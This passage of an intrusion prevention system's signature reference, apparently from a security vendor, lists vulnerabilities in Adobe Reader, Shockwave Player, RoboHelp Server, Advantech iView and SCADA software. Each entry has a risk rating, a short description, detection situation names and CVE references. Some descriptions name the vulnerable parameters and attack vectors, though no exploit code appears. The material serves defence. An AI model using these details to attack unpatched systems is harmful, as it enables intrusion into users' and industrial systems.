Description: A malicious PDF file was detected
Situation: File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4155
References:
CVE-2012-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4155
Back to top

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157

About this vulnerability: Malicious PDF file detected
Risk: Moderate
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
Description: A malicious PDF file was detected.
Situation: File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4157
References:
CVE-2012-4157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4157
Back to top

Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159

About this vulnerability: Malicious PDF file detected
Risk: Moderate
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Input Validation
Description: A malicious PDF file was detected.
Situation: File-PDF_Adobe-Reader-Stack-Overflow-Vulnerability-CVE-2012-4159
References:
CVE-2012-4159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4159
Back to top

Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Adobe Acrobat Reader. The vulnerability is due to an integer overflow when processing the "Shading Count" field in the CLOD Mesh Declaration block. This vulnerability may be exploited by remote attackers to execute arbitrary code on the vulnerable system by enticing a user to open a maliciously crafted PDF document. In attack scenarios where code execution is successful, the injected code will run within the security context of the currently logged in user. If code execution fails, the affected application may terminate abnormally leading to a denial of service condition.
Situation: HTTP_SS-Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
File-PDF_Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
References:
CVE-2010-0196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0196
BID-39329
http://www.securityfocus.com/bid/39329
Back to top

Adobe-Reader-Use-After-Free-CVE-2015-3057

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A use-after-free vulnerability exists in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3057
References:
CVE-2015-3057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3057
Back to top

Adobe-Reader-Use-After-Free-CVE-2015-3059

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A use-after-free vulnerability exists in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Use-After-Free-CVE-2015-3059
References:
CVE-2015-3059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3059
Back to top

Adobe-Reader-Use-After-Free-CVE-2017-3014

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-877-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3014
References:
CVE-2017-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3014
Back to top

Adobe-Reader-Use-After-Free-CVE-2017-3057

About this vulnerability: A vulnerability in Adobe Reader
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Reader.
Situation: File-PDF_Adobe-Reader-Use-After-Free-CVE-2017-3057
References:
CVE-2017-3057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3057
Back to top

Adobe-RoboHelp-Server-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Adobe Systems RoboHelp Server
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Systems RoboHelp Server
Type: Input Validation
Description: There is a vulnerability in Adobe Systems RoboHelp Server. The vulnerability is due to an insufficient validation of the POST requests sent to the web server, allowing an unauthenticated attacker to upload and execute arbitrary files. Successful exploitation of this vulnerability may lead to arbitrary code execution in the context of the SYSTEM user.
Situation: HTTP_CS-Adobe-RoboHelp-Server-Arbitrary-File-Upload
References:
CVE-2009-3068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3068
BID-36245
http://www.securityfocus.com/bid/36245
Back to top

Adobe-RoboHelp-Server-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Adobe Systems RoboHelp Server
Risk: Moderate
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Adobe Systems RoboHelp Server
Type: Directory Traversal
Description: Improper validation of the fileName parameter in certain requests causes a directory traversal vulnerability in Adobe RoboHelp Server. A successful attack can allow code to be executed with system privileges.
Situation: HTTP_CS-Adobe-RoboHelp-Server-Filename-Directory-Traversal
References:
CVE-2021-42727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42727
Back to top

Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in Adobe Shockwave Director detected
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Shockwave Director
Type: Malfunction
Description: A buffer overflow vulnerability exists in Adobe Shockwave Player. The vulnerability is due to an error allocating a buffer for the KEY* element in a Director file, which leads to copying data from the file past the end of this buffer. A remote attacker can exploit this vulnerability by enticing a target user to visit a maliciously crafted web site.
Situation: HTTP_SS-Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
References:
CVE-2011-2111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2111
BID-48300
http://www.securityfocus.com/bid/48300
OSVDB-73028
http://www.osvdb.org/73028
Back to top

Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to insufficient validation of certain values in a pamm chunk of a Director file. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user. In the case of an unsuccessful attack, the affected application may terminate abnormally.
Situation: HTTP_SS-Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
References:
CVE-2010-4084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4084
Back to top

Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption

About this vulnerability: Adobe Shockware player has a vulnerability in tSAC chunk parsging which can result in arbitrary code execution
Risk: High
First detected in: sgpkg-ips-345-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to a signedness error while parsing tSAC chunks in Adobe Director files. By providing a certain negative value, calculation of a pointer may lead to a memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product.
Situation: HTTP_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Parsing-Memory-Corruption
References:
CVE-2010-2866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866
BID-42665
http://www.securityfocus.com/bid/42665
Back to top

Adobe-Shockwave-Director-tSAC-Chunk-String-Termination-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: Moderate
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: A memory corruption vulnerability has been identified in Adobe Shockwave Player. The vulnerability is due to the software blindly using a string-size value, which is provided in the file, to null-terminate a string. This allows an attacker to write a null-byte at a controlled offset from the beginning of the string buffer. A remote attacker can exploit this vulnerability by enticing a target user to visit a maliciously crafted web site containing a specially crafted Adobe Director file. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the affected application abnormally.
Situation: File-RIFF_Adobe-Shockwave-Director-tSAC-Chunk-Termination-Memory-Corruption
References:
CVE-2011-2118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2118
Back to top

Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution

About this vulnerability: A code execution vulnerability in Adobe Shockwave Player
Risk: High
First detected in: sgpkg-ips-306-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Adobe Systems Shockwave Player
Type: Input Validation
Description: There is a code execution vulnerability in Adobe Shockwave Player. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious DIR file with a vulnerable version of the product to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
File-RIFF_Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
References:
CVE-2010-1292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1292
BID-40079
http://www.securityfocus.com/bid/40079
OSVDB-64657
http://www.osvdb.org/64657
Back to top

Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Buffer Overflow
Description: A code execution vulnerability exists in Adobe Shockwave Player.
Situation: HTTP_SS-Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
File-RIFF_Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
References:
CVE-2010-3655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3655
BID-44516
http://www.securityfocus.com/bid/44516
Back to top

Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: There is a code execution vulnerability in Adobe Shockwave player. The vulnerability is due to insufficient sanitation while parsing an offset value in PAMI record of a Director file. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
File-RIFF_Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
References:
CVE-2010-2872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872
BID-42679
http://www.securityfocus.com/bid/42679
Back to top

Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: A code execution vulnerability has been reported in Adobe Shockwave Player. The vulnerability is due to an error while parsing crafted data in an rcsL RIFF chunk of a DIR file. An attacker can exploit this vulnerability by enticing a user to process a malicious file, which can result in remote code execution under the security context of the current user.
Situation: File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability
References:
CVE-2012-2031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2031
BID-53420
http://www.securityfocus.com/bid/53420
OSVDB-81750
http://www.osvdb.org/81750
Back to top

Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Uninitialized-Object-Access

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: Moderate
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Systems Shockwave Player
Type: Malfunction
Description: A code execution vulnerability has been reported in Adobe Shockwave Player. The vulnerability is due to an error while parsing crafted data in an rcsL RIFF chunk of a DIR file. An attacker can exploit this vulnerability by enticing a user to process a malicious file, which could result in remote code execution under the security context of the current user.
Situation: File-RIFF_Adobe-Shockwave-Player-rcsL-Chunk-Parsing-Vulnerability
References:
CVE-2012-2030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2030
BID-53420
http://www.securityfocus.com/bid/53420
OSVDB-81749
http://www.osvdb.org/81749
Back to top

Adobe-Shockwave-Player-rcsL-Corruption

About this vulnerability: A code execution vulnerability in Adobe Shockwave Player
Risk: High
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Systems Shockwave Player
Type: Input Validation
Description: There is a code execution vulnerability in Adobe Shockwave Player.
Situation: HTTP_SS-Adobe-Shockwave-Player-rcsL-Corruption
File-RIFF_Adobe-Shockwave-Player-rcsL-Corruption
References:
CVE-2010-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3653
BID-44291
http://www.securityfocus.com/bid/44291
Back to top

Adobe-ShockwavePlayer-DirectorFile-RecordParsing-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Systems Shockwave Player
Type: Integer Overflow
Description: A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to an integer overflow error while calculating the size value for heap memory allocation while parsing a FFFFFF88 record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user. In the case of an unsuccessful attack, the affected application may terminate abnormally.
Situation: HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
References:
CVE-2010-2876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2876
BID-46326
http://www.securityfocus.com/bid/46326
Back to top

Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution

About this vulnerability: A vulnerability in Adobe Systems Shockwave Player
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Systems Shockwave Player
Type: Integer Overflow
Description: A code execution vulnerability exists in Adobe Shockwave player. The vulnerability is due to an integer overflow error while calculating the size value for heap memory allocation while parsing a FFFFFF88 record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious DIR file using a vulnerable version of the product. Successful exploitation of this vulnerability would result in arbitrary code execution in the security context of the logged in user. In the case of an unsuccessful attack, the affected application may terminate abnormally.
Situation: HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
File-RIFF_Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
References:
CVE-2010-4192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4192
BID-46326
http://www.securityfocus.com/bid/46326
Back to top

ADODB.Stream-ActiveX-Object-Local-Disk-Write

About this vulnerability: ADODB.Stream ActiveX object allows write access to local file system
Risk: High
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Data Access Components
Type: Insecure Configuration
Description: ADODB.Stream ActiveX object is designed to allow access to local files from browsed-based applications running in the local zone. However, when combined with other vulnerabilities or insecure browser configuration, this object may be accessed from the internet zone allowing unprivileged file write access to the local system. This weakness is exploited by malware.
Situation: HTTP_ADODB.Stream-ActiveX-Object-Local-Disk-Write
File-Text_ADODB.Stream-ActiveX-Object-Local-Disk-Write
References:
BID-10514
http://www.securityfocus.com/bid/10514
Back to top

Adroit-SCADA-Intelligence-Server-DoS

About this vulnerability: A vulnerability in Adroit SCADA Intelligence Server
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adroit SCADA Intelligence Server
Type: Malfunction
Description: There is a denial of service vulnerability in Adroit SCADA Intelligence Server
Situation: Generic_CS-Adroit-SCADA-Intelligence-Server-DoS
Back to top

Adsincontext

About this vulnerability: AdsInContext
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: AdsInContext
Type: Misconfiguration
Description: AdsInContext is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adsincontext
Back to top

Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution

About this vulnerability: A vulnerability in Advantech AdamView
Risk: Moderate
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech AdamView
Type: Buffer Overflow
Description: A stack-buffer overflow has been reported in Advantech ADAMView, a Supervisory Control and Data Acquisition software (SCADA) specifically designed for low-volume I/O environments. The vulnerability is due to insufficient validation of conditional bitmaps from a file. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected user.
Situation: File-Binary_Advantech-Adamview-Conditional-Bitmap-Remote-Code-Execution
References:
CVE-2014-8386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8386
BID-71191
http://www.securityfocus.com/bid/71191
OSVDB-114843
http://www.osvdb.org/114843
Back to top

Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution

About this vulnerability: A vulnerability in Advantech AdamView
Risk: Moderate
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech AdamView
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported in Advantech ADAMView, a Supervisory Control and Data Acquisition software (SCADA) specifically designed for low-volume I/O environments. The vulnerability is due to insufficient validation of display properties from a file. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected user.
Situation: File-Binary_Advantech-Adamview-Display-Properties-Parameter-Remote-Code-Execution
References:
CVE-2014-8386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8386
BID-71191
http://www.securityfocus.com/bid/71191
OSVDB-114843
http://www.osvdb.org/114843
Back to top

Advantech-Domain-Focused-Configuration-Tool-DoS

About this vulnerability: A vulnerability in Advantech Domain Focused Configuration Tool
Risk: Moderate
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech Domain Focused Configuration Tool
Type: Malfunction
Description: There is a denial of service vulnerability in Advantech Domain Focused Configuration Tool
Situation: Generic_SS-Advantech-Domain-Focused-Configuration-Tool-DoS
Back to top

Advantech-Iview-Commandservlet-Directory-Traversal

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Platform: Generic
Software: Advantech iView
Type: Directory Traversal
Description: There exists a directory traversal vulnerability in the Advantech iView. Successful exploitation could lead in the disclosure of sensitive information.
Situation: HTTP_CRL-Advantech-Iview-Commandservlet-Directory-Traversal
References:
CVE-2021-22656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22656
Back to top

Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1515-5242
Last changed: sgpkg-ips-1515-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper validation of the column_value parameter in the ConfigurationServlet of Advantech iView causes an SQL injection vulnerability which can allow an attacker to gain access to information on the target system.
Situation: HTTP_CRL-Advantech-Iview-Configurationservlet-Column_Value-SQL-Injection
References:
CVE-2022-3323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3323
Back to top

Advantech-Iview-CVE-2022-2138-Denial-Of-Service

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1500-5242
Platform: Generic
Software: Advantech iView
Type: Malfunction
Description: Improper parsing of HTTP requests causes a denial of service vulnerability in Advantech Iview.
Situation: HTTP_CS-Advantech-Iview-CVE-2022-2138-Denial-Of-Service
References:
CVE-2022-2138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2138
Back to top

Advantech-Iview-Deleteztpconfig-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1362-5242
Last changed: sgpkg-ips-1362-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: There exists an SQL injection vulnerability in the Advantech iView. Successful exploitation could lead in arbitrary SQL statements.
Situation: HTTP_CSU-Advantech-Iview-Deleteztpconfig-SQL-Injection
References:
CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932
Back to top

Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Platform: Generic
Software: Advantech iView
Type: Directory Traversal
Description: There exists a vulnerability in Advantech iView, versions prior to 5.7.02.5992, which allows remote attackers to execute arbitrary code due to the insufficient validation of user supplied paths before use in exportInventoryTable method.
Situation: HTTP_CRL-Advantech-Iview-Devicetreetable-exportInventoryTable-Directory-Traversal
References:
CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245
Back to top

Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Advantech iView
Type: Directory Traversal
Description: Improper validation of user-supplied paths before using in exportTaskMgrReport method causes a directory traversal vulnerability in Advantech iView. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Advantech-Iview-Devicetreetable-Exporttaskmgrreport-Directory-Traversal
References:
CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245
Back to top

Advantech-Iview-exportInventoryTable-Sort-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: A SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the sortname and sortorder parameters in the exportInventoryTable process. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CRL-Advantech-Iview-exportInventoryTable-Sort-SQL-Injection
References:
CVE-2022-2136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2136
Back to top

Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1493-5242
Last changed: sgpkg-ips-1493-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: An SQL injection vulnerability has been reported for Advantech iView. This vulnerability is due to improper input validation for the segment parameter in the findCfgDeviceList process. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection or, in the worst case, remote code execution in the context of SYSTEM.
Situation: HTTP_CRL-Advantech-Iview-Findcfgdevicelist-Segment-SQL-Injection
References:
CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135
Back to top

Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal

About this vulnerability: A vulnerability in Advantech iView.
Risk: High
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1487-5242
Platform: Generic
Software: Advantech iView
Type: Directory Traversal
Description: A vulnerability in Advantech iView, versions prior to 5.7.04.6469, which allows remote attackers to create files and potentially execute code by sending a crafted request to the target server, due to validation of user-supplied path before using in findCfgDeviceListDetailsExport method.
Situation: HTTP_CSU-Advantech-Iview-findCfgDeviceListDetailsExport-Filename-Directory-Traversal
References:
CVE-2022-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2139
Back to top

Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView.
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Platform: Generic
Software: Advantech iView
Type: SQL Injection
Description: A vulnerability in Advantech iView, versions prior to 5.7.04.6469, which allows remote attackers to execute arbitrary SQL commands by sending a crafted request to the target server, due to improper input validation for the sort_field and sort_type parameters in the findTaskMgrItems process.
Situation: HTTP_CRL-Advantech-Iview-findTaskMgrItems-Sort-SQL-Injection
References:
CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135
Back to top

Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper input validation for the search_date_from and search_date_to parameters in the getAllActiveTraps process causes an SQL injection vulnerability in Advantech Iview. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Advantech-Iview-Getallactivetraps-Search_Date-SQL-Injection
References:
CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135
Back to top

Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1488-5242
Last changed: sgpkg-ips-1488-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper input validation for the sortname and sortorder in the getInventoryReportData process causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL on the target.
Situation: HTTP_CRL-Advantech-Iview-getInventoryReportData-Sort-SQL-Injection-2
References:
CVE-2022-2135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2135
Back to top

Advantech-Iview-getInventoryReportData-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: There exists an SQL injection vulnerability in the Advantech iView, versions prior to 5.7.03.6182, which allows remote attackers to execute arbitrary SQL statements, due to the lack of input validation in the getInventoryReportData method in the NetworkServlet Java class.
Situation: HTTP_CSU-Advantech-Iview-getInventoryReportData-SQL-Injection
References:
CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932
Back to top

Advantech-Iview-Getpsinventoryinfo-SQL-Injection

About this vulnerability: A vulnerability in Advantech iView
Risk: Moderate
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: Improper validation of user-supplied input in getPSInventoryInfo of the NetworkServlet Java class causes an SQL injection vulnerability in Advantech iView. A successful exploit allows an attacker to execute arbitrary SQL statements on the target.
Situation: HTTP_CRL-Advantech-Iview-Getpsinventoryinfo-SQL-Injection
References:
CVE-2021-32932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32932
Back to top

Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection

About this vulnerability: A vulnerability in Advantech iView.
Risk: High
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Advantech iView
Type: Input Validation
Description: A vulnerability in Advantech iView, versions before 5.7.04.6469, which allows remote attackers to execute arbitrary commands by sending crafted requests, due to improper input validation of the backup_filename parameter while updating NetworkServlet database.
Situation: HTTP_CRL-Advantech-Iview-NetworkServlet-BackupDatabase-Backup_Filename-Command-Injection
References:
CVE-2022-2143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2143
Back to top

Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal

About this vulnerability: A vulnerability in Advantech iView
Risk: High
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Platform: Generic
Software: Advantech iView
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Advantech iView. The vulnerability is due to improper validation of user-supplied path before using in exportPSInventoryTable method. A remote attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted server. Successful exploitation of this vulnerability could lead to arbitrary file creation and potential for code execution on the affected system with privileges of SYSTEM.
Situation: HTTP_CRL-Advantech-Iview-Pstable-Exportpsinventorytable-Directory-Traversal
References:
CVE-2020-16245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16245
Back to top

